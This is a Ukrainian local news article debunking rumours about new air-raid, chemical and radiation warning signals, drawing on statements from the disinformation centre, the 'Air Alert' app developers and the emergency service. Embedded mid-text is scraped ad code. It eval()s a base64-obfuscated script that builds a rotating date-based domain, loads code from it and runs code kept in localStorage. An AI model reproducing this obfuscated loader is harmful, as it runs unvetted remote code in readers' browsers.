Нові сигнали повітряної тривоги: фейк чи ні

У звʼязку з поширенням інформації у ЗМІ та інтернеті про введення нових сигналів оповіщення про надзвичайні ситуації, ДСНС надала офіційне розʼяснення про те, як працює уніфікована система інформування населення в Україні.

Нагадаємо, раніше «Акцент» з посиланням на Центр протидії дезінформації при РНБО України повідомляв про введення в Україні нових сигналів тривоги.

Стверджувалося, що вони діятимуть у окремих територіальних громадах:

Сигнал хімічної небезпеки – звук церковних дзвонів.Сигнал радіаційної небезпеки – дзвін в набат.Сигнал евакуації з міста — гудок потяга. Після такого сповіщення потрібно увімкнути місцеве радіо або телебачення і чекати на подальшу інформацію. Інформацію про оновлення сигналів тривоги розробники програми «Повітряна тривога» у своєму Twitter назвали фейком

«Друзі, інформація про оновлення сигналів тривоги у загальних системах сповіщення, яка зараз активно шириться соціальними мережами та новинними ресурсами – це фейк! Застосунок «Повітряна тривога» не має до цього жодного відношення», — йдеться у дописі.

Пізніше, через інформаційний колапс, на сайті розробника програми «Повітряна тривога», був опублікований реліз

Хронологія подій:

Одна з міських адміністрацій України випустила новину про різні види оповіщення у разі екстрених ситуацій;2-го серпня застосунок «Повітряна тривога» оновився до версії 4.0., у якому з’явилася можливість сповіщень про хімічну та радіаційну небезпеку;У TikTok з’явилося відео про різні сигнали тривог застосунку;Центр протидії дезінформації при РНБО України зробив заяву про оновлення сигналів повітряної тривоги та пізніше спростував некоректні трактування цієї новини деякими ЗМІ;У ЗМІ продовжили ширитися новини із TikTok-відео про різні сигнали тривог застосунку та посиланням на інформацію від Центру протидії дезінформації, яку вже спростували;Ми поширили інформацію про те, що відео користувача TikTok — це фейк, маючи на увазі, що сигнали, демонстровані у відео, відповідають лише додатку, а не загальним системам сповіщення, як це було сприйнято аудиторією.

Просимо вибачення, що заплутали вас. Сподіваємося, цей реліз зможе остаточно роз’яснити ситуацію.

В свою чергу, Центр протидії дезінформації спростував фейки про нові сигнали повітряної тривоги. Фейк 1. Звук церковних дзвонів, гудок потягу, набат – немає таких сигналів!

Спростування: Вінницька міськрада одна з перших затвердила нові звуки повітряної тривоги в разі виникнення хімічної та радіаційної небезпеки, а також оповіщення про початок евакуації. Текст рішення: https://www.vmr.gov.ua/alerts var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Фейк 2. Нові звуки повітряних тривог незаконні!

Спростування: Постанова КМУ №733 від 27.09.2017р. затверджує Положення про організацію оповіщення. Відповідно до неї, саме органи місцевого самоврядування самостійно затверджують «порядок оповіщення», отже мають право самостійно обирати сигнали.

Фейк 3. Почув звук потягу біля вокзалу – біжи в укриття!

Спростування: Звук відповідної тривоги лунатиме із системи оповіщення, і триватиме щонайменше 30 сек. Водночас диктор говорить: «Увага всім!» і повідомляє про порядок дій під час небезпеки.

Офіційна заява ДСНС в Україні щодо сигналів оповіщення населення про загрозу виникнення або виникнення надзвичайних ситуацій

За інформацією Державної служби з надзвичайних ситуацій, порядок передачі сигналів оповіщення населення визначений п. 19 Положення про організацію оповіщення про загрозу виникнення або виникнення надзвичайних ситуацій та зв’язку у сфері цивільного захисту, затвердженого постановою Кабінету Міністрів України від 27 вересня 2017 р. № 733.

Зокрема, для привернення уваги, перед доведенням інформації до населення про загрозу виникнення або виникнення надзвичайної ситуації, передається попереджувальний сигнал “Увага всім”, а саме: уривчасте звучання електросирен, часті гудки транспорту, зокрема у запису мережами радіомовлення та через вуличні гучномовні пристрої. Тривалість звучання попереджувального сигналу становить три — п’ять хвилин.

Після попереджувального сигналу здійснюється трансляція телерадіомережами відповідних повідомлень про загрозу виникнення або виникнення надзвичайної ситуації із супроводженням інформації жестовою мовою та/або субтитруванням, якщо вона є голосовою, і аудіокоментуванням, якщо вона є візуальною.

Заголовне фото: з відкритих джерел (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/novi-signali-povitryanoyi-trivogi-fejk-chi-ni/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top